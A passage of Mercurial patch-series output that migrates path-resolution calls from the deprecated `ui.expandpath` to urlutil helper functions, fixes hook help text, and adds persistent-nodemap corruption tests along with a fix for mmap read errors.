) - - if not outgoing.missing: - scmutil.nochangesfound(ui, repo, not base and outgoing.excluded) - return 1 + else: + outgoing = discovery.outgoing(repo, missingroots=missing) + outgoing.excluded = sorted(excluded) if cgversion == b'01': # bundle1 bversion = b'HG10' + bundlespec.wirecompression diff --git a/tests/test-bundle-r.t b/tests/test-bundle-r.t --- a/tests/test-bundle-r.t +++ b/tests/test-bundle-r.t @@ -171,14 +171,15 @@ should fail $ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg test-3 - abort: --base is incompatible with specifying a destination + abort: --base is incompatible with specifying destinations [10] $ hg -R test bundle -a -r tip test-bundle-branch1.hg test-3 - abort: --all is incompatible with specifying a destination + abort: --all is incompatible with specifying destinations [10] $ hg -R test bundle -r tip test-bundle-branch1.hg - abort: repository default-push not found - [255] + config error: default repository not configured! + (see 'hg help config.paths') + [30] $ hg -R test bundle --base 2 -r tip test-bundle-branch1.hg 2 changesets found diff --git a/tests/test-exchange-multi-source.t b/tests/test-exchange-multi-source.t --- a/tests/test-exchange-multi-source.t +++ b/tests/test-exchange-multi-source.t @@ -170,6 +170,11 @@ date: Thu Jan 01 00:00:00 1970 +0000 summary: C + $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push + searching for changes + searching for changes + searching for changes + 6 changesets found $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push pushing to ./branch-E-push searching for changes @@ -351,6 +356,11 @@ date: Thu Jan 01 00:00:00 1970 +0000 summary: C + $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push --rev default + searching for changes + searching for changes + searching for changes + 2 changesets found $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push 
--rev default pushing to ./branch-E-push searching for changes @@ -429,6 +439,11 @@ date: Thu Jan 01 00:00:00 1970 +0000 summary: C + $ hg bundle -R test-repo-bare bundle.hg ./branch-G-push ./branch-H-push ./branch-E-push --rev default + searching for changes + searching for changes + searching for changes + 2 changesets found $ hg push --force -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default pushing to ./branch-G-push searching for changes # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618414167 -7200 # Wed Apr 14 17:29:27 2021 +0200 # Node ID 3800a6aafb6ff339edd4c347b6d2d84904e2c3b1 # Parent 946db89607c8802873c5a4457d07a937c316ee41 identify: use `get_unique_pull_path` The command only supports a single destination. We use the associated API. Differential Revision: https://phab.mercurial-scm.org/D10415 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -3864,7 +3864,9 @@ peer = None try: if source: - source, branches = urlutil.parseurl(ui.expandpath(source)) + source, branches = urlutil.get_unique_pull_path( + b'identify', repo, ui, source + ) # only pass ui when no repo peer = hg.peer(repo or ui, opts, source) repo = peer.local() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618414862 -7200 # Wed Apr 14 17:41:02 2021 +0200 # Node ID 279df499511e90bafed58f25ca56e0191efbf867 # Parent 3800a6aafb6ff339edd4c347b6d2d84904e2c3b1 incoming: kill the `repo._subtoppath =` hack We do the same as for `hg outgoing`, instead of relying on implicitly passing values by monkey-punching them onto the repo object, we pass equivalent information by argument to the proper function. This is way cleaner. 
Differential Revision: https://phab.mercurial-scm.org/D10416 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4351,11 +4351,7 @@ finally: other.close() - repo._subtoppath = ui.expandpath(source) - try: - return hg.incoming(ui, repo, source, opts) - finally: - del repo._subtoppath + return hg.incoming(ui, repo, source, opts) @command( diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1255,7 +1255,14 @@ def _incoming( - displaychlist, subreporecurse, ui, repo, source, opts, buffered=False + displaychlist, + subreporecurse, + ui, + repo, + source, + opts, + buffered=False, + subpath=None, ): """ Helper for incoming / gincoming. @@ -1270,6 +1277,14 @@ msg %= len(srcs) raise error.Abort(msg) source, branches = srcs[0] + if subpath is not None: + subpath = urlutil.url(subpath) + if subpath.isabs(): + source = bytes(subpath) + else: + p = urlutil.url(source) + p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) + source = bytes(p) other = peer(repo, opts, source) cleanupfn = other.close try: @@ -1297,7 +1312,7 @@ return 0 # exit code is zero since we found incoming changes -def incoming(ui, repo, source, opts): +def incoming(ui, repo, source, opts, subpath=None): def subreporecurse(): ret = 1 if opts.get(b'subrepos'): @@ -1321,7 +1336,9 @@ count += 1 displayer.show(other[n]) - return _incoming(display, subreporecurse, ui, repo, source, opts) + return _incoming( + display, subreporecurse, ui, repo, source, opts, subpath=subpath + ) def _outgoing(ui, repo, dests, opts, subpath=None): diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -882,7 +882,8 @@ opts = copy.copy(opts) opts.pop(b'rev', None) opts.pop(b'branch', None) - return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts) + subpath = subrepoutil.repo_rel_or_abs_source(self._repo) + return hg.incoming(ui, self._repo, source, 
opts, subpath=subpath) @annotatesubrepoerror def files(self): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618418082 -7200 # Wed Apr 14 18:34:42 2021 +0200 # Node ID 338ab1d89ddb6d528802b98e825fa71ccb8c4a3c # Parent 279df499511e90bafed58f25ca56e0191efbf867 clone: use `get_clone_path` "Surprisingly", the new API is well suited for `hg clone` too. Differential Revision: https://phab.mercurial-scm.org/D10417 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -689,7 +689,7 @@ if dest: ui.status(_(b"destination directory: %s\n") % dest) else: - dest = ui.expandpath(dest) + dest = urlutil.get_clone_path(ui, dest)[0] dest = urlutil.urllocalpath(dest) source = urlutil.urllocalpath(source) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618416145 -7200 # Wed Apr 14 18:02:25 2021 +0200 # Node ID 82366464190abbca9c06cb06ddc7ee4fb6b28fc9 # Parent 338ab1d89ddb6d528802b98e825fa71ccb8c4a3c init: use `get_clone_path` when suitable `hg init` has this weird feature where you can refer to a `[paths]` entry to select the path to initialize. We move that code to the new APIs. Differential Revision: https://phab.mercurial-scm.org/D10418 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4376,7 +4376,8 @@ Returns 0 on success. """ opts = pycompat.byteskwargs(opts) - peer = hg.peer(ui, opts, ui.expandpath(dest), create=True) + path = urlutil.get_clone_path(ui, dest)[1] + peer = hg.peer(ui, opts, path, create=True) peer.close() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618418249 -7200 # Wed Apr 14 18:37:29 2021 +0200 # Node ID 394cfc42c05c728be1fcef6dff2be51083f0889b # Parent 82366464190abbca9c06cb06ddc7ee4fb6b28fc9 share: use `get_clone_path` Since `hg share` is mostly like clone, do the same changes there. 
Differential Revision: https://phab.mercurial-scm.org/D10419 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -305,11 +305,10 @@ if not dest: dest = defaultdest(source) else: - dest = ui.expandpath(dest) + dest = urlutil.get_clone_path(ui, dest)[1] if isinstance(source, bytes): - origsource = ui.expandpath(source) - source, branches = urlutil.parseurl(origsource) + origsource, source, branches = urlutil.get_clone_path(ui, source) srcrepo = repository(ui, source) rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None) else: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618421448 -7200 # Wed Apr 14 19:30:48 2021 +0200 # Node ID 5d91eeac37ab3b404c936a6c6dba1e5e75359c5f # Parent 394cfc42c05c728be1fcef6dff2be51083f0889b summary: use the new APIs Summary can perform some incoming/outgoing queries (that should be common to the other command with the same needs, but that is another story). We now use the new APIs to do so. The current code behavior is a bit fishy, relying to the fact "default" will be picked as the destination in last resort. I did not altered that, but left various comment to highlight the issue. Differential Revision: https://phab.mercurial-scm.org/D10420 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -7210,7 +7210,12 @@ return def getincoming(): - source, branches = urlutil.parseurl(ui.expandpath(b'default')) + # XXX We should actually skip this if no default is specified, instead + # of passing "default" which will resolve as "./default/" if no default + # path is defined. 
+ source, branches = urlutil.get_unique_pull_path( + b'summary', repo, ui, b'default' + ) sbranch = branches[0] try: other = hg.peer(repo, {}, source) @@ -7233,11 +7238,22 @@ source = sbranch = sother = commoninc = incoming = None def getoutgoing(): - dest, branches = urlutil.parseurl( - ui.expandpath(b'default-push', b'default') - ) - dbranch = branches[0] - revs, checkout = hg.addbranchrevs(repo, repo, branches, None) + # XXX We should actually skip this if no default is specified, instead + # of passing "default" which will resolve as "./default/" if no default + # path is defined. + d = None + if b'default-push' in ui.paths: + d = b'default-push' + elif b'default' in ui.paths: + d = b'default' + if d is not None: + path = urlutil.get_unique_push_path(b'summary', repo, ui, d) + dest = path.pushloc or path.loc + dbranch = path.branch + else: + dest = b'default' + dbranch = None + revs, checkout = hg.addbranchrevs(repo, repo, (dbranch, []), None) if source != dest: try: dother = hg.peer(repo, {}, dest) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618424109 -7200 # Wed Apr 14 20:15:09 2021 +0200 # Node ID 3000f2100711852109d46955eb84efcbb7b063cd # Parent 5d91eeac37ab3b404c936a6c6dba1e5e75359c5f remotefilelog: use `get_unique_pull_path` in `getflogheads` Another command moved to the new API, hooray. 
Differential Revision: https://phab.mercurial-scm.org/D10421 diff --git a/tests/remotefilelog-getflogheads.py b/tests/remotefilelog-getflogheads.py --- a/tests/remotefilelog-getflogheads.py +++ b/tests/remotefilelog-getflogheads.py @@ -5,6 +5,9 @@ hg, registrar, ) +from mercurial.utils import ( + urlutil, +) cmdtable = {} command = registrar.command(cmdtable) @@ -18,7 +21,7 @@ Used for testing purpose """ - dest = repo.ui.expandpath(b'default') + dest = urlutil.get_unique_pull_path(b'getflogheads', repo, ui)[0] peer = hg.peer(repo, {}, dest) try: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618424471 -7200 # Wed Apr 14 20:21:11 2021 +0200 # Node ID c5c2936f6fb265b9bcc2740a98b1fede1b963d87 # Parent 3000f2100711852109d46955eb84efcbb7b063cd revset: use `get_unique_pull_path` for `remote(…)` This one is also resolving path. For now we restrict the feature to a single destination. This might change in the future. Differential Revision: https://phab.mercurial-scm.org/D10422 diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -2121,8 +2121,11 @@ if len(l) > 1: # i18n: "remote" is a keyword dest = getstring(l[1], _(b"remote requires a repository path")) - dest = repo.ui.expandpath(dest or b'default') - dest, branches = urlutil.parseurl(dest) + if not dest: + dest = b'default' + dest, branches = urlutil.get_unique_pull_path( + b'remote', repo, repo.ui, dest + ) other = hg.peer(repo, {}, dest) n = other.lookup(q) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618426654 -7200 # Wed Apr 14 20:57:34 2021 +0200 # Node ID e7d082e4ace6740024c0d81cc078f25ab63575ea # Parent c5c2936f6fb265b9bcc2740a98b1fede1b963d87 dispatch: use the new API to resolve --repository An even weirder feature of Mercurial is the ability to use `[paths]` alias as value of `--repository`. The weird feature now use the new APIs. 
Differential Revision: https://phab.mercurial-scm.org/D10424 diff --git a/mercurial/dispatch.py b/mercurial/dispatch.py --- a/mercurial/dispatch.py +++ b/mercurial/dispatch.py @@ -50,6 +50,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) @@ -990,7 +991,7 @@ lui.readconfig(os.path.join(path, b".hg", b"hgrc-not-shared"), path) if rpath: - path = lui.expandpath(rpath) + path = urlutil.get_clone_path(lui, rpath)[0] lui = ui.copy() if rcutil.use_repo_hgrc(): _readsharedsourceconfig(lui, path) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618426958 -7200 # Wed Apr 14 21:02:38 2021 +0200 # Node ID 5a6a1cd21f0952dcd8bc0e18c80759b6801b039e # Parent e7d082e4ace6740024c0d81cc078f25ab63575ea profiling: use `util.expandpath` instead of `ui.expandpath` for output Given we are talking about the path to an output file, I am fairly certain that the initial author meant to expand `~` and the like and not to resolve entry from `[paths]`. Differential Revision: https://phab.mercurial-scm.org/D10425 diff --git a/mercurial/profiling.py b/mercurial/profiling.py --- a/mercurial/profiling.py +++ b/mercurial/profiling.py @@ -228,7 +228,7 @@ if self._output == b'blackbox': self._fp = util.stringio() elif self._output: - path = self._ui.expandpath(self._output) + path = util.expandpath(self._output) self._fp = open(path, b'wb') elif pycompat.iswindows: # parse escape sequence by win32print() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618427499 -7200 # Wed Apr 14 21:11:39 2021 +0200 # Node ID 9e021cffb3566e501aacc9bf72d4a1e1704ddecf # Parent 5a6a1cd21f0952dcd8bc0e18c80759b6801b039e debugdiscovery: use `get_unique_pull_path` Lets move this code to the new API. 
Differential Revision: https://phab.mercurial-scm.org/D10426 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1060,7 +1060,9 @@ if not remote_revs: - remoteurl, branches = urlutil.parseurl(ui.expandpath(remoteurl)) + remoteurl, branches = urlutil.get_unique_pull_path( + b'debugdiscovery', repo, ui, remoteurl + ) remote = hg.peer(repo, opts, remoteurl) ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl)) else: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618427722 -7200 # Wed Apr 14 21:15:22 2021 +0200 # Node ID 69359c91dc4303460020ed0c1edf475a02a6b186 # Parent 9e021cffb3566e501aacc9bf72d4a1e1704ddecf debugssl: use `get_unique_pull_path` Let's move this code to the new API. Differential Revision: https://phab.mercurial-scm.org/D10427 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3654,7 +3654,9 @@ ) source = b"default" - source, branches = urlutil.parseurl(ui.expandpath(source)) + source, branches = urlutil.get_unique_pull_path( + b'debugssl', repo, ui, source + ) url = urlutil.url(source) defaultport = {b'https': 443, b'ssh': 22} # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618427753 -7200 # Wed Apr 14 21:15:53 2021 +0200 # Node ID d7b36a4e03dec3a946ca8c1a0f6d4de96826cbc1 # Parent 69359c91dc4303460020ed0c1edf475a02a6b186 debugbackupbundle: use `get_unique_pull_path` This is the last known user of `ui.expandpath` outside of `urlutil`. Hooray. 
Differential Revision: https://phab.mercurial-scm.org/D10428 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3765,8 +3765,14 @@ for backup in backups: # Much of this is copied from the hg incoming logic - source = ui.expandpath(os.path.relpath(backup, encoding.getcwd())) - source, branches = urlutil.parseurl(source, opts.get(b"branch")) + source = os.path.relpath(backup, encoding.getcwd()) + source, branches = urlutil.get_unique_pull_path( + b'debugbackupbundle', + repo, + ui, + source, + default_branches=opts.get(b'branch'), + ) try: other = hg.peer(repo, opts, source) except error.LookupError as ex: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618428058 -7200 # Wed Apr 14 21:20:58 2021 +0200 # Node ID afdd7c472ef2188035b2354d710373b2ae8cd1da # Parent d7b36a4e03dec3a946ca8c1a0f6d4de96826cbc1 urlutil: remove usage of `ui.expandpath` in `get_pull_paths` We want to deprecate `ui.expandpath` and simplify the code before adding more complexity in the form of `[paths]` entry pointing to multiple url. So we inline the relevant bits. Differential Revision: https://phab.mercurial-scm.org/D10429 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -467,7 +467,15 @@ if not sources: sources = [b'default'] for source in sources: - url = ui.expandpath(source) + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. 
+ try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source yield parseurl(url, default_branches) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618428420 -7200 # Wed Apr 14 21:27:00 2021 +0200 # Node ID 0d8541e53e466e344f4bf4652fc88d44041bdbf0 # Parent afdd7c472ef2188035b2354d710373b2ae8cd1da urlutil: remove usage of `ui.expandpath` in `get_unique_pull_path` We want to deprecate `ui.expandpath` and simplify the code before adding more complexity in the form of `[paths]` entry pointing to multiple url. So we inline the relevant bits. Differential Revision: https://phab.mercurial-scm.org/D10430 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -509,8 +509,22 @@ The `action` parameter will be used for the error message. """ if source is None: - source = b'default' - url = ui.expandpath(source) + if b'default' in ui.paths: + url = ui.paths[b'default'].rawloc + else: + # XXX this is the historical default behavior, but that is not + # great, consider breaking BC on this. + url = b'default' + else: + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source return parseurl(url, default_branches) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618428567 -7200 # Wed Apr 14 21:29:27 2021 +0200 # Node ID 221f8585e9857c7babbaddcb387526011476f311 # Parent 0d8541e53e466e344f4bf4652fc88d44041bdbf0 urlutil: remove usage of `ui.expandpath` in `get_clone_path` We want to deprecate `ui.expandpath` and simplify the code before adding more complexity in the form of `[paths]` entry pointing to multiple url. 
So we inline the relevant bits. Differential Revision: https://phab.mercurial-scm.org/D10431 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -530,9 +530,25 @@ def get_clone_path(ui, source, default_branches=()): """return the `(origsource, path, branch)` selected as clone source""" - url = ui.expandpath(source) - path, branch = parseurl(url, default_branches) - return url, path, branch + if source is None: + if b'default' in ui.paths: + url = ui.paths[b'default'].rawloc + else: + # XXX this is the historical default behavior, but that is not + # great, consider breaking BC on this. + url = b'default' + else: + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source + clone_path, branch = parseurl(url, default_branches) + return url, clone_path, branch def parseurl(path, branches=None): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618441392 -7200 # Thu Apr 15 01:03:12 2021 +0200 # Node ID b03527bdac011ba47a4f5e914ecc32019d30b9b8 # Parent 221f8585e9857c7babbaddcb387526011476f311 ui: deprecated `ui.expandpath` This function returns a single path, something incompatible with the coming change to `[paths]` definition to allow multiple associated urls. Now that all users got migrated, we deprecate the function. 
Differential Revision: https://phab.mercurial-scm.org/D10432 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -1030,6 +1030,8 @@ def expandpath(self, loc, default=None): """Return repository location relative to cwd or from [paths]""" + msg = b'ui.expandpath is deprecated, use `get_*` functions from urlutil' + self.deprecwarn(msg, b'6.0') try: p = self.getpath(loc) if p: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618473552 -7200 # Thu Apr 15 09:59:12 2021 +0200 # Node ID 1e2f2c782928014c347d3706fbcd61758118de7f # Parent b03527bdac011ba47a4f5e914ecc32019d30b9b8 revset: drop an outdated comment There is no `ui.expandpath` call there anymore. Differential Revision: https://phab.mercurial-scm.org/D10435 diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1856,7 +1856,6 @@ l and getstring(l[0], _(b"outgoing requires a repository path")) or b'' ) if dest: - # ui.getpath() explicitly tests for None, not just a boolean dests = [dest] else: dests = [] # HG changeset patch # User Aay Jay Chan <aayjaychan@itopia.com.hk> # Date 1617288235 -28800 # Thu Apr 01 22:43:55 2021 +0800 # Node ID 314386a19cffb37e6c96161ac230cada9eee06b3 # Parent 1e2f2c782928014c347d3706fbcd61758118de7f help: prepend environment variables used in hooks with "$" Most of them have a "$" prefix but some don't, so adding it for consistency. Differential Revision: https://phab.mercurial-scm.org/D10398 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1151,7 +1151,7 @@ ``pretxnopen`` Run before any new repository transaction is open. The reason for the transaction will be in ``$HG_TXNNAME``, and a unique identifier for the - transaction will be in ``HG_TXNID``. A non-zero status will prevent the + transaction will be in ``$HG_TXNID``. 
A non-zero status will prevent the transaction from being opened. ``pretxnclose`` @@ -1160,12 +1160,12 @@ content or change it. Exit status 0 allows the commit to proceed. A non-zero status will cause the transaction to be rolled back. The reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for - the transaction will be in ``HG_TXNID``. The rest of the available data will + the transaction will be in ``$HG_TXNID``. The rest of the available data will vary according the transaction type. New changesets will add ``$HG_NODE`` (the ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last added changeset), ``$HG_URL`` and ``$HG_SOURCE`` variables. Bookmark and - phase changes will set ``HG_BOOKMARK_MOVED`` and ``HG_PHASES_MOVED`` to ``1`` - respectively, etc. + phase changes will set ``$HG_BOOKMARK_MOVED`` and ``$HG_PHASES_MOVED`` to + ``1`` respectively, etc. ``pretxnclose-bookmark`` Run right before a bookmark change is actually finalized. Any repository @@ -1179,7 +1179,7 @@ will be empty. In addition, the reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for the transaction will be in - ``HG_TXNID``. + ``$HG_TXNID``. ``pretxnclose-phase`` Run right before a phase change is actually finalized. Any repository change @@ -1191,7 +1191,7 @@ while the previous ``$HG_OLDPHASE``. In case of new node, ``$HG_OLDPHASE`` will be empty. In addition, the reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for the transaction will be in - ``HG_TXNID``. The hook is also run for newly added revisions. In this case + ``$HG_TXNID``. The hook is also run for newly added revisions. In this case the ``$HG_OLDPHASE`` entry will be empty. 
``txnclose`` # HG changeset patch # User Aay Jay Chan <aayjaychan@itopia.com.hk> # Date 1617603557 -28800 # Mon Apr 05 14:19:17 2021 +0800 # Node ID 2c843ad6852812eb1de9be7f1a03c81c631866d3 # Parent 314386a19cffb37e6c96161ac230cada9eee06b3 help: document `$HG_NEW_OBSMARKERS` in pretxnclose hook Differential Revision: https://phab.mercurial-scm.org/D10399 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1165,7 +1165,8 @@ (the ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last added changeset), ``$HG_URL`` and ``$HG_SOURCE`` variables. Bookmark and phase changes will set ``$HG_BOOKMARK_MOVED`` and ``$HG_PHASES_MOVED`` to - ``1`` respectively, etc. + ``1`` respectively. The number of new obsmarkers, if any, will be in + ``$HG_NEW_OBSMARKERS``, etc. ``pretxnclose-bookmark`` Run right before a bookmark change is actually finalized. Any repository # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618633701 14400 # Sat Apr 17 00:28:21 2021 -0400 # Node ID d9531094cf8ef7098a2120160e22ad33acb7709f # Parent 2c843ad6852812eb1de9be7f1a03c81c631866d3 cmdutil: fix an uninitialize variable usage in clearunfinished() I happened to notice that PyCharm flagged this while looking for something else. I'm pretty sure it meant to check the current state in the iteration, and not keep reusing the last one in the previous iteration. 
Differential Revision: https://phab.mercurial-scm.org/D10459 diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -3776,7 +3776,7 @@ raise error.StateError(state.msg(), hint=state.hint()) for s in statemod._unfinishedstates: - if s._opname == b'merge' or state._reportonly: + if s._opname == b'merge' or s._reportonly: continue if s._clearable and s.isunfinished(repo): util.unlink(repo.vfs.join(s._fname)) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618577953 -7200 # Fri Apr 16 14:59:13 2021 +0200 # Node ID 99aed233aa8d873f6f2e3249b7e086a9df9227b6 # Parent d9531094cf8ef7098a2120160e22ad33acb7709f nodemap: test various corruption scenario for the persistent nodemap Corruption can happens in the wild, either because some of our code is buggy or because repository were shared/transfered in a strange manners. Currently one of the corruption case (not enough data) lead to a crash. We add explicit tests for theses cases. Differential Revision: https://phab.mercurial-scm.org/D10457 diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -747,6 +747,63 @@ data-unused: 0 data-unused: 0.000% +Test various corruption case +============================ + +Missing datafile +---------------- + +Test behavior with a missing datafile + + $ hg clone --quiet --pull test-repo corruption-test-repo + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog-*.nd (glob) + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + $ rm corruption-test-repo/.hg/store/00changelog*.nd + $ hg log -R corruption-test-repo -r . 
+ changeset: 5005:90d5d3ba2fc4 + tag: tip + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a2 + + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + +Truncated data file +------------------- + +Test behavior with a too short datafile + +rebuild the missing data + $ hg -R corruption-test-repo debugupdatecache + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog-*.nd (glob) + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + +truncate the file + + $ datafilepath=`ls corruption-test-repo/.hg/store/00changelog*.nd` + $ f -s $datafilepath + corruption-test-repo/.hg/store/00changelog-*.nd: size=121088 (glob) + $ dd if=$datafilepath bs=1000 count=10 of=$datafilepath-tmp status=none + $ mv $datafilepath-tmp $datafilepath + $ f -s $datafilepath + corruption-test-repo/.hg/store/00changelog-*.nd: size=10000 (glob) + +Check that Mercurial reaction to this event + + $ hg -R corruption-test-repo log -r . + abort: index 00changelog.i is corrupted + [50] + + stream clone ------------ # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618580340 -7200 # Fri Apr 16 15:39:00 2021 +0200 # Node ID a3720569a43fe0be36cf15d69060e423545200d5 # Parent 99aed233aa8d873f6f2e3249b7e086a9df9227b6 nodemap: deal with data mmap error If the file is too small, the mmapread call would raise a ValueError. We catch that and ignore nodemap content (as we do without mmap). This make the repository slightly slower (until the next write) but usable. Unlike the current crash. 
Differential Revision: https://phab.mercurial-scm.org/D10458 diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -53,7 +53,11 @@ try: with revlog.opener(filename) as fd: if use_mmap: - data = util.buffer(util.mmapread(fd, data_length)) + try: + data = util.buffer(util.mmapread(fd, data_length)) + except ValueError: + # raised when the read file is too small + data = b'' else: data = fd.read(data_length) except (IOError, OSError) as e: diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -799,9 +799,13 @@ Check that Mercurial reaction to this event - $ hg -R corruption-test-repo log -r . - abort: index 00changelog.i is corrupted - [50] + $ hg -R corruption-test-repo log -r . --traceback + changeset: 5005:90d5d3ba2fc4 + tag: tip + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a2 + stream clone # HG changeset patch # User Aay Jay Chan <aayjaychan@itopia.com.hk> # Date 1618331905 -28800 # Wed Apr 14 00:38:25 2021 +0800 # Node ID 6904a9f33b302c9d1cf3625e438cc63e8133d562 # Parent a3720569a43fe0be36cf15d69060e423545200d5 help: clarify when `$HG_URL` and `$HG_SOURCE` are added in hooks Differential Revision: https://phab.mercurial-scm.org/D10400 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1161,12 +1161,12 @@ status will cause the transaction to be rolled back. The reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for the transaction will be in ``$HG_TXNID``. The rest of the available data will - vary according the transaction type. New changesets will add ``$HG_NODE`` - (the ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last - added changeset), ``$HG_URL`` and ``$HG_SOURCE`` variables. 
